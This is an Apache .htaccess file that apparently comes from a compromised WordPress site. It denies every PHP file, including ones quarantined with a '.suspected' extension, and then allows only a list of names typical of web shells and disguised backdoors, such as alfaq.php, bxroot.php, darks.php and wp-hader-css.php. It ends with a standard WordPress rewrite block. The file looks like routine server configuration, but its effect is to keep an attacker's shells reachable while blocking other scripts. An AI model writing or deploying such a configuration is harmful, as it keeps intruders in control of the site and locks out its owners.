<FilesMatch ".*\.(phtml|php|PhP|php5|suspected)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(config.php|fetch.php|tn.php|epep.php|1a.php|a.php|alfaq.php|hpa1.php|hps2.php|hp23.php|hp4.php|darks.php|bxroot.php|nothaxor.php|wp-content-css.php|wp-hader-css.php|style-css.php|3PJcpMFsD8B.php|5PJcpMFsD8B.php|file-manager.php|index.php|xrsoot.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>